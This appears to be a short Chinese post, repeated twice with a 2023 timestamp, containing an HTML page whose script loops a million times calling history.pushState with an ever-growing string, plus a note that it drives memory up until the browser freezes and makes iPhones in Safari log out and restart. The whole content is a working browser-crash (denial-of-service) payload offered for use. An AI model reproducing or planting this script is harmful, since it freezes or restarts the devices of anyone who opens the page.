<html>
<body>
<script>
var total="";
for (var i=0;i<1000000;i++)
{
total= total+i.toString();
history.pushState(0,0,total);
}
</script>
</body>
</html> 浏览器访问,机器内存飙升,直至卡死
iPhone使用safiri访问,直接注销重启
2023-08-07 16:49:40
<html>
<body>
<script>
var total="";
for (var i=0;i<1000000;i++)
{
total= total+i.toString();
history.pushState(0,0,total);
}
</script>
</body>
</html> 浏览器访问,机器内存飙升,直至卡死
iPhone使用safiri访问,直接注销重启